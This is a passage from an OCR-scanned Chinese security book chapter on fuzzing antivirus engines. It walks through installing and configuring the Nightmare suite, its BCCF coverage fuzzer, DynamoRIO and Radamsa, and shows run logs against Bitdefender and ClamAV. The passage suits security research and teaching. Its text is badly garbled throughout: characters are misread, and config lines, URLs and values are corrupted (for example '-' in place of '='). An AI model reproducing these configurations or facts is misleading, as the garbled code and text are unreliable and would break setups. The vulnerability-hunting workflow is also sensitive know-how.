第 一 种 方法 在 实战 场景 下 应 用 较 少 。SMT 处 理 器 前 景 巨 大 , 不 过 因为 对 硬件 要 求 过 高 ， 所 以 
只 能 作为 实验 性 项 目 。 现 实 中 ， 确 实 有 一 些 类 似 Microsoff SAGE 这 样 的 案例 ， 不 过 如 前 所 述 ， 这 
类 工具 需要 消耗 很 大 的 资源 。 当 下 ， 要 在 家 里 运行 SAGE 针 对 目标 反 病 毒 软件 进行 模糊 测试 根本 
不 可 行 。 

有 一 些 类 似 SAGE 的 不 错开 源 工具 : MoFlow 工 具 集 中 的 egas， 可 以 通过 https://github.com/ 
vrtadmin/moflow 下 载 。 但 是 ， 开 发 者 指出 由 于 扩展 性 不 是 很 好 ，egas 从 2014 版 本 开始 就 无 法 处 理 
ACTA KB 的 传人 字 节 序列 数据 了 。egas 在 处 理 中 到 大 型 的 输入 数据 以 及 大 量 真实 文件 目标 时 ,很 
可 能 会 消耗 不 少时 间 。 我 也 试 过 使 用 这 款 工 具 针 对 一 款 反 病毒 产品 进行 了 为 期 一 周 的 测试 , 工具 
运行 的 过 程 中 消耗 了 4 GB 的 内 存 ， 最 终 没 有 获取 到 任何 有 价值 的 测试 结果 ， 测 试 也 就 随 之 终止 。 
但 是 , 这 类 工具 确实 可 以 挖掘 到 漏洞 。 不 过 问题 是 ， 如 果 在 家 里 的 计算 机 上 使 用 这 类 工具 开展 测 
试 的 话 ， 就 会 遇 到 我 之 前 尝试 过 程 中 遇 到 的 问题 。egas 无 疑 是 一 款 出 色 有 效 的 工具 ,但 是 就 目前 
来 说 ， 传 入 的 测试 样本 大 小 还 十 分 有 限 。 

第 二 种 办 法 更 容易 实行 , 消耗 的 资源 少 而 且 发 现 漏洞 的 速度 更 快 。 这 类 测试 方法 的 核心 理念 
是 : 借助 随机 或 半 随 机 的 模糊 测试 样本 生成 手段 ， 最 大 化 代码 覆盖 率 。 下 面 列 出 两 个 新 工具 。 

口 American Fuzzy Lop (AFL ) ”该 款 模糊 测试 工具 由 著名 的 安全 研究 者 Michal Zalewski 开 
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发 ， 其 设计 和 工作 原理 在 本 节 已 有 阐释 ， 即 基于 代码 覆盖 测试 。 
O Blind Code Coverage Fuzzer ( BCCF ) 该 款 模 糊 测 试 工具 由 作为 本 书 作者 之 一 的 
Joxean Koret 开 发 。 它 是 Nightmare 模 糊 测 试 框架 的 一 部 分 。 

上 述 两 款 工 具 类 似 , 但 是 其 实现 和 执行 的 模糊 测试 算法 有 所 差别 。 接 下 来 将 介绍 Nightmare 
模糊 测试 框架 中 的 Blind Code Coverage Fuzzer， 以 及 如 何 使 用 Nightmare 模 糊 测 试 框架 来 针对 反 病 
毒 产品 开展 漏洞 模糊 测试 挖掘 。 

1. Blind Code Coverage Fuzzer 工 具 

BCCF 是 Nightmare 模 糊 测试 框架 中 的 一 个 组 件 ， 有 以 下 功能 : 

O 最 大 化 样本 文件 代码 罕 盖 座 ” 它 能 够 最 大 化 原始 模糊 测试 模版 文件 的 代码 覆盖 率 ; 

O 挖 握 漏 洞 “ 它 可 以 挖掘 出 原始 模糊 测试 模版 无 法 覆盖 的 特性 ; 

O 挖掘 新 的 模糊 测试 模版 ” 它 会 对 原始 测试 模版 进行 随机 修改 ， 以 此 创建 模糊 测试 畸变 文 
件 。 而 这 些 新 创建 的 样本 文件 又 可 以 传递 给 使 用 不 同样 本 生成 算法 的 工具 ,来 针对 原始 
模糊 测试 模版 没有 和 窗 盖 到 的 特性 进行 测试 。 

对 于 BCCF 以 及 相 类 似 的 其 他 模糊 测试 工具 来 说 ， 最 有 意思 的 特性 就 是 ， 它 们 可 以 自动 化 挖 
掘 新 的 特性 并 将 原始 模版 文件 的 代码 覆盖 率 最 大 化 。 在 许多 场景 下 这 一 点 都 是 十 分 有 用 的 : 

OQ 由 于 冷门 或 过 于 老 旧 ， 只 能 找到 某 文件 格式 为 数 不 多 的 相关 样本 ; 

口 从 不 同 源头 收集 到 的 样本 过 于 相似 ， 和 覆盖 的 特征 集 重 全。 

BCCF 对 于 在 上 述 情况 中 进行 的 模糊 测试 大 有 帮助 。BCCF 同 时 使 用 到 了 著名 开源 项 目 
DynamoRIO 中 的 标准 代码 覆盖 测试 工具 DrCov 和 同一 项 目下 的 工具 Intel PIN。 简 单 来 说 ，BCCF 
通过 运行 待 测 目标 处 理 原 始 模版 文件 , 对 原始 传人 缓冲 区 内 容 做 修改 , 来 挖掘 出 可 以 覆盖 到 新 基 
本 区 块 的 针对 原始 测试 模版 的 改动 。 不 过 BCCF 实 际 工作 的 过 程 会 比 前 面 描述 的 更 复杂 一 些 。 

BCCF 首 先 尝试 计算 ， 在 传人 样本 文件 相同 的 条 件 下 ， 目 标 程序 执行 的 基础 区 块 平 均 数 。 基 
于 一 系列 不 同 的 样本 文件 畸变 策略 ， 计 算出 最 小 值 、 最 大 值 和 平均 值 。BCCF 接 着 会 借助 随机 或 
半 随 机 的 修改 方式 对 原始 模版 进行 变动 , 然后 计算 执行 了 多 少 不 同 的 基础 区 块 。 如 果 找 到 了 新 的 
基础 区 块 ， 就 会 创建 新 的 模糊 测试 样本 ， 接 着 新 创建 的 样本 又 被 用 作 新 的 模版 。BCCF 又 会 对 新 
模版 应 用 进一步 修改 变动 , 来 挖掘 出 之 前 没有 覆盖 到 的 基础 区 块 。 但 是 ， 如 果 在 迭代 修改 模版 文 
件 多 次 后 ,程序 发 现 执 行 的 基础 区 数量 低 于 之 前 水 平 或 趋 于 稳定 , 则 相关 模糊 测试 模版 会 被 丢弃 ， 
程序 会 调用 之 前 一 版 的 样本 作为 新 的 模糊 测试 模版 。 

除非 手动 停止 ， 否 则 BCCF 可 以 持续 不 断 地 运行 下 去 ， 挖 气 目 标 软件 的 漏洞 ， 找 到 可 以 作为 
新 一 代 模 版 的 测试 样本 ,也 有 可 能 不 断 进 行 迭 代 直 到 样本 文件 数量 达到 最 大 值 。 


接 下 来 将 会 介绍 如 何 安 装配 置 BCCF， 来 为 之 后 的 相关 实验 作 准 备 。 

2. Blind Code Coverage Fuzzer 的 使 用 

要 使 用 BCCF , 首先 要 安装 Nightmare 模 糊 测试 套装 , 可 以 在 以 下 地 址 下 载 : https://github.com/ 
joxeankoret/nightmare/, 


可 以 通过 以 下 指令 ， 在 装 有 Linux 的 机 器 上 ， 将 GIT 本 地 仓库 (Repository ) 复制 一 份 到 本 地 
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目录 下 : 
$ git clone https://github.com/joxeankoret/nightmare.git 
下 载 完 成 后 ， 我 们 会 看 到 Nightmare 模 糊 测试 套装 有 以 下 文件 和 目录 ; 


$ ls /path/to/nightmare 


AUTHORS dependencies  fuzzers lib LICENSE.txt  NEWS.txt 
README.md results samples  TODO.txt COPYING.txt doc 
fuzzersUpd LICENSE mutators presos README.txt runtime tasks 


我 们 还 需要 安装 BCCF 默 认 使 用 的 二 进 制 探测 工具 DynamoRIO 。 可 以 根据 使 用 的 系统 情况 ， 
从 以 下 地 址 下 载 : https:/github.com/DynamoRIO/dynamorio/wiki/Downloads。 

此 处 演示 实验 使 用 的 是 DynamoRIO V4.2.0-3 版 ， 不 过 由 于 BCCF 使 用 的 是 标准 工具 DrCov， 
使 用 DynamoRIO 的 任意 新 版 本 都 是 可 以 的 .下载 完 成 以 后 ,解压 缩 到 指定 目录 。 然 后 ,从 Nightmare 
模糊 测试 框架 的 目录 下 复制 一 份 fzzers/bcf cfg.example， 将 其 重 命名 为 fozzers/bcf cfg。 我 们 需要 
编辑 此 文件 来 告诉 BCCF 工 具 DynamoRIO 的 目录 在 哪里 ， 并 引导 BCCF 工 具 调用 相关 模块 。 最 后 ， 
需要 在 fuzzers/bcf.cfg 配 置 文件 中 添加 如 下 代码 : 























[BCF] 

templates-path-/path/to/nightmare/samples/some dir 

# Current options are: DynamoRIO, Pin 

bininst-tool-DynamoRIO 

# Use *ONLY* iterative algorithm instead of all algorithms? 
diterative-1 

# Use *ONLY* radamsa instead of all the implemented algorithms? 
#radamsa=1 


[DynamoRIO] 
pathz/path/to/dynamorio/DynamoRIO-Linux-4.2.0-3/ 
成 功 正确 配置 二 进 制 探 测 工具 后 ， 我 们 需要 安装 一 款 名 为 Radamsa 的 工具 。Radamsa 是 一 款 
用 于 名 zzer 健 壮 性 测试 的 测试 样 例 生 成 工具 。 它 会 尝试 推断 传人 文件 的 语法 ， 然 后 根据 推 凑 出 的 
语法 生成 测试 样 例 。Radamsa 是 目前 最 好 的 畸形 样 例 生成 工具 。 可 以 使 用 以 下 指令 下 载 并 安装 


Radamsa: 





























$ curl http://haltp.org/download/radamsa-0.4.tar.gz \ 
| tar -zxvf - && cd radamsa-0.4 && make && sudo make install 


安装 Radamsa 后 ， 可 以 通过 以 下 指令 对 其 进行 测试 : 




















sh-4.3$ echo "Testing 123" | radamsa 
Testing 2147483649 
sh-4.3$ echo "Testing 123" | radamsa 


-1116324324324323935052789 

-1116324323935052789046909 

sh-4.3$ echo "Testing 123" | radamsa 

Testing 3 

Testing 4294967292949672929496729294967292949672929496729294967292949672 
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sh-4.3$ echo "Testing 123" | radamsa 

Testing3 

ing3 

ing3 

如 上 所 示 ，Radamsa 尝 试 对 传人 入 字符 串 Testing 123 进 行 变形 ， 并 生成 完全 不 同 的 字符 串 。 
最 后 一 部 分 是 配置 BCCF , 使 其 能 对 目标 反 病 毒 软 件 进 行 模 糊 测试 。 这 里 我 们 测试 的 是 Bitdefender 
antivirus。 在 bcfcfg 中 加 入 以 下 几 行 














BitDefender] 

Command line to launch it 
command-/usr/bin/bdscan --no-list 

Base tube name 

basetube-bitdefender 

The tube the fuzzer will use to pull of samples 
tube-$ (basetube)s-samples 

The tube the fuzzer will use to record crashes 
crash-tube-$ (basetube)s-crash 

Extension for the files to be fuzzed 
extension-.fil 

Timeout for this fuzzer 

timeout-z90 

Environment 

environment-common-environment 

File to load/save the state with BCF fuzzer 
State-file-state.dat 
current-state-file-current-state-bd 
generation-bottom-level--25 

Skip-bytes-7 

save-generations-1 











[common-environment] 
MALLOC CHECK -2 


需要 注意 上 述 针对 Bitdefender antivirus 配 置 中 粗 体 部 分 的 内 容 。 我 们 需要 在 配置 中 填写 清楚 
运行 指令 、 二 进 制 探 测 工具 的 超时 时 间 以 及 为 待 测 软 件 设置 的 环境 变量 。 将 MALLOC_CHECK_ 设 
置 成 2， A 6E 够 挖掘 GNU LIBC 库 中 有 记载 的 缺陷 。 
成 功 安装 所 有 依赖 模块 并 正确 配置 BCCF 以 后 ,就 可 以 开始 使 用 BCCF 了 。 可 以 通过 运行 bcf py 
来 了 解 如 何在 命令 行 模式 下 使 用 BCCF: 


nightmare/fuzzers$ ./bcf.py 
Usage: ./bcf.py (32164) «config file» «section» «input file» «output 
directory» [«max iterations»] 








The first argument to ./bcf.py is the architecture, 32bit or 64bit. 
我 们 可 以 使 用 如 下 指令 ， 使 模糊 测试 样本 代码 最 大 化 地 覆盖 到 Bitdefender antivirus 的 特性 : 


$ ./bcf.py 32 bcf.cfg BitDefender ../samples/av/sample.lnk out 100 
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Wed Apr 22 13:41:04 2015 7590:140284692117312] Selected a maximum size 
of 6 change(s) to apply 
Wed Apr 22 13:41:04 2015 7590:140284692117312] Input file is 
../samples/av/041414-18376-01.dmp.lnk 
Wed Apr 22 13:41:04 2015 7590:140284692117312] Recording a total of 10 
value(s) of coverage... 
Wed Apr 22 13:41:15 2015 7590:140284692117312] Statistics: Min 24581, 
Max 24594, Avg 24586.400000, Bugs 0 
Wed Apr 22 13:41:15 2015 7590:140284692117312] Maximizing file in 
100 iteration(s) 
Wed Apr 22 13:41:29 2015 7590:140284692117312] GOOD! Found an 
interesting change at 0x0! Covered basic blocks 24604, original maximum 24594 
Wed Apr 22 13:41:29 2015 7590:140284692117312] Writing discovered 
generation file 4d120a4e3bc360815a7113bccc642fedfd537479 
(cut/generation 4d120a4e35bc360815a7113bccc642fedfd537479.1nk) 
Wed Apr 22 13:41:29 2015 7590:140284692117312] New statistics: 
Min 24594, Max 24604, Avg 24599.000000 
Wed Apr 22 13:41:33 2015 7590:140284692117312] GOOD! Found an 
interesting change at 0x0! 
Covered basic blocks 24605, original maximum 24604 
Wed Apr 22 13:41:33 2015 7590:140284692117312] Writing discovered 
generation file e349166e31de0793af62e6acll1ecda20e8a759bd 
(out/generation e349166e31de0793af62e6acl1ecda20e8a759bd.lnk) 


Ua] 


BCCF 会 尝试 使 用 样本 sample.Ink 进 行 最 高 100 次 迭代 来 最 大 化 代码 履 盖 , 接着 BCCF 会 将 生成 
的 样本 保存 到 相关 目录 下 。 一 段 时 间 后 ， 我 们 将 能 看 到 类 似 以 下 信息 : 


[Wed Apr 22 13:47:04 2015 7590:1 
Min 24654, Max 24702, 
[Wed Apr 22 13:47:13 2015 7590:1 
generation value -2, 


Avg 24678. 


total generation(s) 
[Wed Apr 22 13:47:18 2015 7590:1 


140284692117312] 
000000 
140284692117312] 


40284692117312] 





New statistics: 


Iteration 100, current 


preserved 8 


File successfully 


maximized from min 24581, max 24594 to min 24654, max 24702 





[Wed Apr 22 13:47:18 2015 7590:1 


40284692117312] 


File 


out/51de04329d92a435c6fd3eef5930982467c9a25f.max written to disk 


原始 文件 覆盖 了 24 5$94 个 基础 区 块 ， 代 码 履 盖 最 大 化 的 生成 样本 覆盖 了 24 702 个 基础 区 块 : 
整整 多 出 108 个 基础 区 块 。 我 们 可 以 使 用 新 生成 的 最 大 化 代码 覆盖 的 样本 作为 模版 。 























我 们 也 可 以 对 BCCF 进 行 配置 ， 使 其 不 是 通过 
执行 ， 直 到 人 工 移 除 最 后 一 个 参数 而 停止 工具 的 执行 : 
$ ./bcf.py 32 bcf.cfg BitDefender 
Wed Apr 22 11:45:42 2015 28514:139923369727808 
of 7 change(s) to apply 
Wed Apr 22 11:45:42 2015 28514:139923369727808 
../samples/av/041414-18376-01.dmp.lnk 
Wed Apr 22 11:45:42 2015 28514:139923369727808 
10 value(s) of coverage... 
Wed Apr 22 11:45:51 2015 28514:139923369727808 
Max 24588, Avg 24584.750000, Bugs 0 
Wed Apr 22 11:45:51 2015 28514:139923369727808 
Wed Apr 22 11:48:00 2015 28514:139923369727808 





























系列 迭代 最 大 化 样本 代码 覆盖 率 ， 而 是 不 断 


../samples/av/041414-18376-01.dmp.lnk out 


Selected a maximum size 
Input file is 

Recording a total of 
Statistics: Min 24582, 
Fusziüg... 

GOOD! Found an 


13.1 模糊 测试 201 





interesting change at 0x0! 

Covered basic blocks 24589, original maximum 24588 

Wed Apr 22 11:48:00 2015 28514:139923369727808] Writing discovered 
generation file 064b4e756ec94a8870f£61504d8a3081115bb3b313e 
(out/generation, 064b4e756ec94a8870f£61508d8a3081115D530313e.1nk) 


Wed Apr 22 11:48:00 2015 28514:139923369727808] New statistics: 
Min 24588, Max 24589, Avg 24588.500000 
Wed Apr 22 11:48:03 2015 28514:139923369727808] GOOD! Found an 


interesting change at 0xa5e! Covered basic blocks 24596, 
original maximum 24589 
Wed Apr 22 11:48:03 2015 28514:139923369727808] Writing discovered 
generation file d5f30e9a01109eb87363b2e6cf1807c000d505598 
(out/generation d5f30e9a01109e5873635b2e6cf£1807c000d55598.1nk) 

Wed Apr 22 11:48:03 2015 28514:139923369727808] New statistics: 
Min 24589, Max 24596, Avg 24592.500000 
[P 
Wed Apr 22 13:39:42 2015 28514:139923369727808] Iteration 1915, current 
generation value -10, total generation(s) preserved 7 

Wed Apr 22 13:39:45 2015 28514:139923369727808] GOOD! Found an 
interesting change at 0x2712c! Covered basic blocks 30077, 

original maximum 30074 
Wed Apr 22 13:39:45 2015 28514:139923369727808] Writing discovered 
generation file 0d409746pbd76a546d2e8ef4535674c60daa90021 
(out/generation, 0dH409746bd76a546d2e8ef4535674c60daa90021.1nk) 

Wed Apr 22 13:39:45 2015 28514:139923369727808] New statistics: 
Min 30074, Max 30077, Avg 30075.500000 
Wed Apr 22 13:40:28 2015 28514:139923369727808] Dropping current 
generation and statistics as we have too many bad results 

Wed Apr 22 13:40:28 2015 28514:139923369727808] Statistics: Min 30071, 
Max 30074, Avg 30072.500000, Bugs 0 
Wed Apr 22 13:40:28 2015 28514:139923369727808] Iteration 1927, 
current generation value -7, total generation(s) preserved 7 


Ca) 
在 本 例 中 ，BCCF 创 建 了 一 系列 代码 覆盖 率 最 大 化 的 样本 文件 ， 最 后 一 次 迭代 生成 时 ， 可 以 
发 现 BCCF 成 功 将 代码 覆盖 率 从 24 588 个 基础 区 块 提升 到 了 30 074 个 基础 区 块 : 整整 多 了 5486 个 1 























13.1.7 ”模糊 测试 套 组 Nightmare 


Nightmare 是 一 款 带 有 统一 中 央 管理 功能 的 分 布 式 模糊 测试 套 组 。Nightmare 虽 然 也 能 在 Cu 
Windows 和 Mac OS X 上 运行 ， 不 过 其 主要 应 用 场景 是 Linux 系 统 。 我 们 可 以 使 用 该 模糊 测试 套 组 
来 动态 测试 不 同 的 反 病 毒 产品 。 前 面 已 经 给 出 了 Nightmare 模 糊 测 试 套 组 的 下 载 地 址 : 
https://github.com/Joxeankoret/nightmare/ 

可 以 通过 以 下 指令 ， 从 GitHub 上 复制 下 载 一 份 Nightmare 模 糊 测试 套 组 的 最 新 版 本 : 

$ git clone https://github.com/joxeankoret/nightmare.git 

下 载 安 装 包 后 ， 打 开 docinstalltxt， 然 后 按照 其 中 介绍 的 步骤 进行 操作 。installtxt 在 线 版 可 
以 通过 如 下 地 址 获取 : https://github.com/joxeankoret/nightmare/blob/master/doc/install.txt ; 

我 们 要 安装 Nightmare 所 依赖 的 以 下 组 件 : 
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口 Python 在 Linux 和 Mac OS X 上 ，Python 默 认 已 经 安装 ， 不 过 Windows 下 仍 需 手动 安装 ; 
O MySQL server 用 于 存储 崩 演 信息 ; 
口 Capstone Python binding ”从 www.capstone-engine.org/download.html 下 载 Python 第 三 方 内 


置 反 汇编 库 ; 
口 Beanstalkd 在 Linux 系 统 中 ， 直 接 通 过 运行 命令 apt-get install beanstalkd 进 行 安 
装 ; 





口 Radamsa 这 是 Nightmare 使 用 的 模糊 测试 修改 器 。 可 以 通过 https:Wcode.google.comy/p/ 
ouspg/wiki/Radamsa 下 载 带 有 安装 指引 的 Radamsa。 
为 了 能 够 执行 一 些 模糊 测试 修改 器 ( 比如 针对 MachO 或 OLE2 容 器 文件 格式 的 智能 模糊 测试 
修改 器 ) 和 二 进 制 探测 器 ， 我 们 可 以 有 选择 地 安装 以 下 依赖 组 件 : 
口 DynamoRIO 一 款 开 源 二 进 制 探测 工具 ， 可 以 通过 www.dynamorio.org 下 载 ; 
口 Zzuf 一 款 多 用 途 模糊 测试 工具 。 在 Linux 系 统 中 ， 可 以 通过 运行 命令 apt-get 
install zzuf 安 装 ; 
O Python macholib ”针对 MachO 的 Python 解 析 知 ， 可 以 从 https://pypi.python.org/pypi/macho- 
lib/ 下 载 。 
安装 完 Nightmare 所 有 依赖 组 件 ， 并 创建 完成 MySQL 数 据 库 后 ， 通 过 以 下 指令 完成 安装 
Nightmare 模 糊 测试 套 组 的 最 后 一 步 : 


$ cd nightmare/runtime 
$ python nightmare frontend.py 











运行 上 述 指令 以 后 ， 程 序 默认 会 在 localhost:8080 启 动 一 个 Web server。 如 图 13-1 所 示 ， 我 们 
只 要 使 用 浏览 器 访问 http:/localhost:8080， 点 击 Configuration 链 接 ， 配 置 样本 路 径 、 模 版 路 径 、 安 
装 路 径 、Beanstalkd 监 听 的 地 址 及 其 端口 ( 默认 为 11300 )。 















































Configuration 
HDdex |. | nessezeeccrenc 
| Configuration — .— Samples path: — /home/joxean/Documentos/research/nightmare/results | Path where all the crashing samples will be stored for later analysis. 
| Projects  — .— Templates path: /home/joxean/Documentos/research/nightmare/samples Path where template files, packets, etc... will be read from. 
| Triggers — — — Nightmare path: /home/joxean/Documentos/research/nightmare Path where Nightmare Fuzzing Project is installed. 
Mutation Engines — Queue host: localhost Hostname or IP address of the (Beanstalk) queue server. 
ProjectEngines —— Queue port: 11300 Port where the (Beanstalk) queue server is listening. 
Project Triggers 
Sampe i 
Results —— s 
| 
porn NNNM 
Logout 











图 13-1 Nightmare 模 糊 测 试 套 组 的 最 后 一 个 配置 项 
正确 配置 完 这 些 选 项 以 后 ， 就 只 需要 配置 待 模糊 测试 的 目标 了 。 
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1. 配置 Nightmare 

我 们 以 ClamAyV antivirus Linux 版 为 目标 , 配置 Nightmare 模 糊 测试 套 组 。 我 们 需要 通过 以 下 指 
令 在 装 有 Linux 系 统 的 机 器 上 进行 安装 。 

$ sudo apt-get install clamav 

点 击 Projects 链 接 ， 会 出 现 一 个 如 图 13-2 所 示 的 界面 ， 在 这 里 向 Nightmare 添 加 一 个 新 的 模糊 
测试 目标 。 
































[nsvigation 1] Projects 

i EE 

Ceton asa 

Projects 和 名 三 Python 3.5 Python 3.5 from Mercurial repository. py python35 |0 1000000 Yes No 2015-04-06 
Triggers - \ © *|IDA Pro 6.7 IDA Pro version 6.7 au ida 4 10000 No |Yes |2014-12-30| 
Mutation Engines EM ~、 © * "a mms Another try with MEENIIupdatcd as of Nov-13.av auum i 100000 No Yes 2014-11-13 
Project Engines QNO A © Xr Nov-2014 Fuzzing radare after so many fixes. av radare 1 100 No Yes 2014-11-11 
Project Triggers | «9 S|ESETNod32 [ESET Nod32 for Linux. av eset 10 100000 No — Yes [2014-11-02 
samples [AQ €|[20ct2014 Another try of Radare2 on October 2014. av radare 32 1000000 No Yes 2014-10-09 
Resuts B ox Another try with cg sen ver Let's see... av A-— 4 1000000 No Yes 2014-08-22 
Bugs ox BCCF Testing of Ml vith BCCF av -———9 16 1000000 No Yes 2014-08-13 
Statistics came — ouo av uem o 1000000 No Yes (2014-08-05 
Logout \ © È Python 2.7.3 Python 2.7.3, x86_64 py python 16 1000000 No Yes 2014-07-25 

39 project(s) hidden... Show all projects. 





















































[13-2 ”在 Nightmare 模 糊 测试 套 组 中 新 建 一 个 模糊 测试 项 目 


在 这 些 区域 中 填 人 新 项 目的 信息 。 添 加 一 个 项 目 名 称 、 一 个 可 选 介 绍 , 以 及 $SNIGHTMARE 
DIR/samples/ 目 录 下 一 个 存储 着 所 有 要 被 用 作 模 版 的 样本 子 文件 来。 填写 清楚 Beanstalk 的 tube 前 
级 ， 来 将 相关 job 推 送 给 worker。 设 置 队列 中 维持 的 最 大 样本 数量 (用 于 多 进程 或 多 节点 任务 )， 
同时 配置 手动 停止 任务 前 无 崩 江 的 最 大 迭代 数量 。 填 写 完 上 述 所 有 区 域 后 ,点击 Add New Project 
就 大 功 告 成 了 。 这 样 一 来 ,我 们 就 创建 了 一 个 新 项 目 。 

接着 , 我 们 需要 给 项 目 分 配 一 个 模糊 测试 修改 引擎 。 在 界面 的 左 侧 , 可 以 看 到 Project Engines 
超 链 接 。 点 击 这 个 超 链 接 ， 然 后 选择 中 意 的 模糊 测试 修改 引擎 。 在 测试 反 病毒 软件 的 时 候 ， 建 议 
选择 以 下 几 个 引擎 选项 : 

口 Radamsa multiple ”该 引擎 选项 会 创建 一 个 内 有 10 个 畸变 文件 的 ZIP 文 件 ; 

O Simple replacer multiple 该 引擎 选项 会 创建 一 个 带 有 多 个 文件 的 ZPP 文 件 。 和 Radamsa 不 

一 样 ， 该 引擎 会 用 随机 选 定 的 原始 缓冲 区 的 部 分 数据 去 替换 随机 选 定 的 字符 ; 

Q Charlie Miller multiple 该 引擎 选项 的 工作 方式 和 前 一 个 引擎 类 似 ， 但 是 使 用 的 是 2008 年 
CanSecWest 演 示 的 Charlie Miller 算 法 。 

总 的 来 说 , 创建 带 有 多 个 文件 的 样本 来 进行 模糊 测试 ， 比 创建 单个 文件 然后 针对 创建 的 每 个 
样本 文件 启动 一 个 反 病 毒 引 擎 扫描 实例 测试 要 好 。 

2. 搜寻 样本 

下 一 步 是 为 这 个 项 目 找到 正确 的 样本 。 如 果 一 开始 没有 任何 样本 ， 可 以 点 击 界 面 左 侧 的 
Samples 链 接 。 这 样 Nightmare 模 糊 测 试 套 组 就 会 借助 Google 自 动 下 载 特定 类 型 文件 格式 的 样本 。 
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我 们 可 以 试 着 下 载 一 些 PDF 文 件 来 对 ClamAV 开 展 模 糊 测试 。 点 击 Samples 链 接 ， 完 成 图 13-3 所 示 
的 表单 。 


| Samples 
Samples root directory is configured to "home/joxean/Documentos/research/nightmare/samples'. Samples for each configured projects will be find in sub-directories under this directory. 
Find samples 


If you need to find new samples you can use the following form. It will try to find new samples of the given format using Google search engine. 


WARNING! The process will take a long while and depending on your browser it may not be updated until the whole process finishes. Please be patient. 

















Samples sub-directory: av ———— . | Sub-directory where the new samples found will be downloaded. If the directory does not exists, it will be created. 
File extension: pdf Common file extension for the sample. For example, it can be doc, xls, pdf, chm, zip, rar, etc... 

Additional search terms:| | Additional search terms. It may contain anything. 

Magic header bytes: MPDFA. | Magic header. For example, it can be *6PDF-' in order to find PDF samples. 








图 13-3 ”使 用 Nightmare 模 糊 测试 套 组 查找 样本 


自动 搜寻 下 载 过 程 可 能 会 花 一 些 时 间 ， 我 们 需要 等 待 一 会 儿 。 一 段 时 间 后 ， 我 们 就 可 以 在 
samples/av 子 目录 下 找到 刚刚 下 载 的 一 系列 样本 文件 了 。 

3. 配置 并 运行 fuzzer 

我 们 需要 转 到 目录 nightmare/fuzzers 下 , 并 编辑 文件 generic.cfg 增 加 以 下 几 行 数据 来 配置 fuzzer: 





ClamAV] 

Command line to launch it 
command-/usr/bin/clamscan --quiet 

Base tube name 

basetube-clamav 

The tube the fuzzer will use to pull of samples 
tube-$ (basetube) s-samples 

The tube the fuzzer will use to record crashes 
crash-tube-$ (basetube)s-crash 

Extension for the files to be fuzzed 
extension-.fil 

Timeout for this fuzzer 

timeout-90 

Environment 

environment-clamav-environment 











clamav-environment] 
MALLOC CHECK, -3 


之 前 运行 BCCF 的 过 程 中 ， 在 运行 符 测 软件 之 前 ， 我 们 需要 设置 运行 指令 、 环 境 变量 ， 以 及 
超时 。 但 这 次 , 除了 进行 这 些 配 置 以 外 ,还 需要 配置 其 他 变量 ， 比 如 与 放置 模糊 测试 项 目 任务 路 
径 相关 的 管道 前 级 ， 还 有 崩 淡 管道 ( 存储 月 演 信 息 的 目录 )。 完 成 所 有 配置 后 ， 打 开 一 个 terminal 
并 运行 以 下 指令 
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$ cd nightmare/fuzzers 
joxean8box:-/nightmare/fuzzers$ ./generic fuzzer.py generic.cfg ClamAV 


terminal 显 示 的 结果 如 下 所 示 : 


[Wed Apr 22 19:07:35 2015 19453:140279998961472] Launching fuzzer, 
listening in tube clamav-samples 


这 时 候 ，fuzzer 会 无 限期 等 待 任务 分 配 。 我 们 需要 运行 男 一 条 命令 来 让 任务 真正 开始 工作 。 
在 男 一 个 terminal 里 ， 运 行 以 下 指令 为 项 目 创建 样本 : 


$ cd nightmare/runtime 
$ python nfp engine.py 









































[Wed Apr 22 19:11:35 2015 20075:139868713940800] Reading configuration 
from database... 

Wed Apr 22 19:11:35 2015 20075:139868713940800] Configuration value 
SAMPLES PATH is /home/joxean/nightmare/results 

Wed Apr 22 19:11:35 2015 20075:139868713940800] Configuration value 
TEMPLATES PATH is /home/joxean/nightmare/samples 

Wed Apr 22 19:11:35 2015 20075:139868713940800] Configuration value 
NIGHTMARE PATH is /home/joxean/nightmare 

Wed Apr 22 19:11:35 2015 20075:139868713940800] Configuration value 
QUEUE HOST is localhost 

Wed Apr 22 19:11:35 2015 20075:139868713940800] Configuration value 
QUEUE PORT is 1 1300 

Wed Apr 22 19:11:35 2015 20075:139868713940800] Starting generator... 
Wed Apr 22 19:11:35 2015 20075:139868713940800] Creating sample for 
ClamAV from folder av for tube clamav mutator Radamsa multiple 

Wed Apr 22 19:11:35 2015 20075:139868713940800] Generating mutated file 
/home/joxean/nightmare/results/tmpfZ8uLu 

Wed Apr 22 19:11:35 2015 20075:139868713940800] Putting it in queue and 
updating statistics... 

Wed Apr 22 19:11:35 2015 20075:139868713940800] Creating sample for 
ClamAV from folder av for tube clamav mutator Radamsa multiple 

Wed Apr 22 19:11:35 2015 20075:139868713940800] Generating mutated file 
/home/joxean/nightmare/results/tmpMA4wbSE 

Wed Apr 22 19:11:35 2015 20075:139868713940800] Putting it in queue and 
updating statistics... 

Wed Apr 22 19:11:35 2015 20075:139868713940800] Creating sample for 
ClamAV from folder av for tube clamav mutator Radamsa multiple 

Wed Apr 22 19:11:35 2015 20075:139868713940800] Generating mutated file 
/home/joxean/nightmare/results/tmp44Nk6G 

Wed Apr 22 19:11:36 2015 20075:139868713940800] Putting it in queue and 
updating statistics... 

Wed Apr 22 19:11:36 2015 20075:139868713940800] Creating sample for 
ClamAV from folder av for tube clamav mutator Radamsa multiple 

Wed Apr 22 19:11:36 2015 20075:139868713940800] Generating mutated file 
/home/joxean/nightmare/results/tmptRy Je 

Wed Apr 22 19:11:37 2015 20075:139868713940800] Putting it in queue and 
updating statistics... 

SESS 
脚本 nfp_engine.py 会 创建 样本 并 将 其 放 入 队列 中 。 现 在 ， 如 果 我 们 回 到 fuzzer 等 待 任务 分 配 








的 terminal 中 ， 会 看 到 类 似 下 列 的 结 
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$ python generic fuzzer.py generic.cfg ClamAV 
Wed Apr 22 19:14:47 2015 20324:14043240708691 
listening in tube clamav-samples 
Wed Apr 22 19:14:47 2015 20324:140432407086912] Launching debugger with 
command /usr/bin/clamscan --quiet /tmp/tmpbdMx7p.fil 
Wed Apr 22 19:14:52 2015 20324:140432407086912] Launching debugger with 
command /usr/bin/clamscan --quiet /tmp/tmpwxEVO2.fil 
eus) 
Wed Apr 22 19:15:37 2015 20324:140432407086912] Launching debugger with 
command /usr/bin/clamscan --quiet /tmp/tmptBJOcr.fil 

LibClamAV Warning: Bytecode runtime error at line 56, col 9 

LibClamAV Warning: [Bytecode JIT]: recovered from error 

LibClamAV Warning: [Bytecode JIT]: JITed code intercepted runtime error! 
LibClamAV Warning: Bytecode 40 failed to run: Error during bytecode 
execution 

